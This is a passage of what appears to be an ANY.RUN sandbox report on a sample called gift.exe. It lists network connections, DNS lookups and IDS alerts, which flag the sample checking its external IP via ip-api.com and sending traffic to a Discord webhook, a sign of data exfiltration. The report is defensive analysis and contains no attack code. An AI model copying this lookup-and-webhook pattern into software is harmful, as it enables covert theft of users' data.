http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
1196
SIHClient.exe
GET
200
23.48.23.194:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
1196
SIHClient.exe
GET
200
23.48.23.194:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
1196
SIHClient.exe
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
1196
SIHClient.exe
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
20.190.159.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
20.190.159.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2112
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
23.48.23.193:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
2.16.253.202:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 20.190.159.64
  • 40.126.31.71
  • 20.190.159.75
  • 40.126.31.3
  • 20.190.159.23
  • 40.126.31.131
  • 40.126.31.2
  • 40.126.31.69
whitelisted
google.com
  • 142.250.185.238
whitelisted
crl.microsoft.com
  • 23.48.23.193
  • 23.48.23.139
  • 23.48.23.190
  • 23.48.23.140
  • 23.48.23.191
  • 23.48.23.194
  • 23.48.23.183
  • 23.48.23.138
  • 23.48.23.192
  • 23.48.23.177
  • 23.48.23.146
  • 23.48.23.188
  • 23.48.23.185
whitelisted
www.microsoft.com
  • 2.16.253.202
whitelisted
ip-api.com
  • 208.95.112.1
whitelisted
discord.com
  • 162.159.137.232
  • 162.159.136.232
  • 162.159.135.232
  • 162.159.128.233
  • 162.159.138.232
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

PID
Process
Class
Message
728
gift.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
2196
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2196
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2196
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
728
gift.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
2196
svchost.exe
Misc activity
ET INFO Discord Chat Service Domain in DNS Lookup (discord .com)
728
gift.exe
Misc activity
ET INFO Observed Discord Service Domain (discord .com) in TLS SNI
Misc activity
ET HUNTING Discord WebHook Activity M2 (Contains Key, embeds)
728
gift.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
728
gift.exe
Misc activity
ET INFO Observed Discord Service Domain (discord .com) in TLS SNI
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
gift.exe